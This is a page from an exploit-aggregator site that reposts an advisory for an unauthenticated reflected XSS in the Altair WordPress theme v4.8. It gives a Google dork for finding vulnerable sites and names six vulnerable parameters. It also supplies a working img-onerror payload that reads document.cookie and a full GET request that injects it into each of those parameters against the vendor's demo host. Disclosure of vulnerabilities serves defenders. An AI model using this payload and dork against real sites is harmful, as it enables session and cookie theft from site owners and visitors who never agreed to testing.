Advertisement

Edit
Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020110068

Below is a copy:
Altair WordPress theme v4.8 – Unauthenticated Reflected XSS

[+] :: Exploit Title: Altair WordPress theme v4.8 - Unauthenticated Reflected XSS
[+] :: Google Dork: inurl:/wp-content/themes/altair/
[+] :: Date: 2020-09-10
[+] :: Exploit Author: Ex.Mi [ https://ex-mi.ru ]
[+] :: Vendor: ThemeGoods [ https://themegoods.com ]
[+] :: Software Version: 4.8
[+] :: Software Link: https://themeforest.net/item/tour-travel-agency-altair-theme/9318575
[+] :: Tested on: Kali Linux
[+] :: CVE: 
[+] :: CWE: CWE-79


[i] :: Info:

An Unauthenticated Reflected XSS vulnerability was discovered in the Altair theme v4.8 for WordPress.

Vulnerable parameters: keyword, start_date, start_date_raw, end_date, end_date_raw, budget.


[$] :: Payload:

"><img src=x onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);>


[!] :: PoC:

Tour Grid Fullwidth
[!] :: PoC (Burp Suite): GET /altair/demo/tour-grid-fullwidth/?keyword=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&start_date=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&start_date_raw=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&end_date=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&end_date_raw=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E&budget=%22%3E%3Cimg%20src=x%20onerror=(alert)(`Ex.Mi`);(alert)(document.cookie);%3E HTTP/1.1 Host: themes.themegoods.com [@] :: Contacts: Website: ex-mi.ru Telegram: @ex_mi GitHub: @ex-mi Medium: @ex-mi

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.

Leave a Reply

Your email address will not be published.